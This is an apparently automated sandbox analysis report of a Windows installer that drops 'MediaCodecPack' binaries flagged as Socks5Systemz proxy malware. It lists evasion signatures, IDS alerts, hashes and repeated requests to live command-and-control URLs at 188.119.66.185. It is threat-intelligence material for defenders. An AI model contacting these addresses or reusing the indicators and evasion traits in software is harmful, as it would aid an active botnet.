
Windows Analysis Report
steel.exe.3.exe

Overview

General Information

Sample name: steel.exe.3.exe
Analysis ID: 1577455
MD5: db153670ed84a7e848fa356e7aecc80d
SHA1: 7c6be83fc3b7af9c5980c6d46a4a604b7c878ebd
SHA256: ba58d3f14d7e106b3ad8d60501bdbcaf19506731b5085d478d9a0887e6b0b524
Tags: bulletproof, exe, user-abus3reports
Infos:

Detection

Socks5Systemz
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Yara detected Socks5Systemz
AI detected suspicious sample
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • steel.exe.3.exe (PID: 5040 cmdline: "C:\Users\user\Desktop\steel.exe.3.exe" MD5: DB153670ED84A7E848FA356E7AECC80D)
    • steel.exe.3.tmp (PID: 5472 cmdline: "C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp" /SL5="$2043C,3046688,56832,C:\Users\user\Desktop\steel.exe.3.exe" MD5: 192CB1EFDC38E560F417C173410B8749)
      • mediacodecpack3.exe (PID: 5544 cmdline: "C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe" -i MD5: 1BADA3AB49364C26DA68D41031611AC7)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-VED6B.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\MediaCodecPack\MediaCodecPack.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
00000002.00000002.2981856828.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
00000001.00000002.2981700405.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000002.00000000.1743204779.0000000000401000.00000020.00000001.01000000.00000009.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
Process Memory Space: mediacodecpack3.exe PID: 5544 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |

Source | Rule | Description | Author | Strings
2.0.mediacodecpack3.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T13:44:58.587503+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:04.162347+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49755 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:06.653285+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49761 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:09.025805+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49768 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:11.275909+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49774 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:13.603425+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49780 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:15.872940+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49786 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:18.301991+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49792 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:20.934363+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49797 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:23.260152+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49807 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:25.702931+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49814 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:28.010091+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49819 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:30.289917+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49825 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:32.568917+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49831 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:35.172199+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49837 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:37.453939+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49843 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:39.918052+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49849 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:42.175675+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49855 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:44.633871+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49861 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:47.273710+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49867 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:49.799807+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49878 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:52.148792+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49883 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:54.395265+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49889 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:56.835103+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49894 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:59.123987+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49900 | 188.119.66.185 | 443 | TCP
2024-12-18T13:46:01.600396+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49905 | 188.119.66.185 | 443 | TCP
2024-12-18T13:46:04.210833+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49911 | 188.119.66.185 | 443 | TCP
2024-12-18T13:46:06.464108+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49918 | 188.119.66.185 | 443 | TCP
2024-12-18T13:46:09.283893+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49924 | 188.119.66.185 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T13:44:59.321192+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49737 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:04.886282+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49755 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:07.341047+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49761 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:09.711078+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49768 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:11.970395+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49774 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:14.300144+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49780 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:16.712134+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49786 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:18.984985+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49792 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:21.691519+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49797 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:23.944971+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49807 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:26.388621+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49814 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:28.718839+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49819 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:30.977003+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49825 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:33.376875+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49831 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:35.882009+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49837 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:38.164576+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49843 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:40.598925+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49849 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:43.032789+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49855 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:45.355222+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49861 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:48.150899+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49867 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:50.527844+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49878 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:52.835125+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49883 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:55.077137+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49889 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:57.544183+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49894 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:59.807945+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49900 | 188.119.66.185 | 443 | TCP
2024-12-18T13:46:02.411736+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49905 | 188.119.66.185 | 443 | TCP
2024-12-18T13:46:04.897599+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49911 | 188.119.66.185 | 443 | TCP
2024-12-18T13:46:07.434640+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49918 | 188.119.66.185 | 443 | TCP

AV Detection

Source: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261cda3088 | Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325 | Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4 | Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 | Avira URL Cloud: Label: malware
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion, 1_2_0045D188
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0045D254 ArcFourCrypt, 1_2_0045D254
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0045D23C ArcFourCrypt, 1_2_0045D23C
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_10001000 ISCryptGetVersion, 1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_10001130 ArcFourCrypt, 1_2_10001130

Compliance

Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Unpacked PE file: 2.2.mediacodecpack3.exe.400000.0.unpack
Source: steel.exe.3.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MediaCodecPack_is1
Source: unknown | HTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: Binary string: msvcp71.pdbx# source: is-CJLSG.tmp.1.dr
Source: Binary string: msvcr71.pdb< source: is-0BJ08.tmp.1.dr
Source: Binary string: msvcp71.pdb source: is-CJLSG.tmp.1.dr
Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-SHN24.tmp.1.dr
Source: Binary string: msvcr71.pdb source: is-0BJ08.tmp.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00452A60 FindFirstFileA,GetLastError, 1_2_00452A60
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose, 1_2_00474F88
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 1_2_004980A4
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00464158
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose, 1_2_00462750
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00463CDC
Source: global traffic | TCP traffic: 192.168.2.4:49743 -> 46.8.225.74:2024
Source: Joe Sandbox View | IP Address: 46.8.225.74
Source: Joe Sandbox View | IP Address: 188.119.66.185
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49737 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49774 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49768 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49807 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49761 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49797 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49780 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49819 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49825 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49831 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49855 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49786 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49843 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49755 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49837 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49849 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49861 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49867 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49878 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49883 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49889 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49900 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49911 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49905 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49918 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49894 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49924 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49792 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49814 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49768 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49774 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49814 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49780 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49831 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49755 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49807 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49837 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49889 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49900 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49761 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49786 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49911 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49905 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49894 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49792 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49797 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49918 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49849 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49855 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49867 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49883 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49878 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49861 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49843 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49825 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49819 -> 188.119.66.185:443
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261cda3088 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 188.119.66.185
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
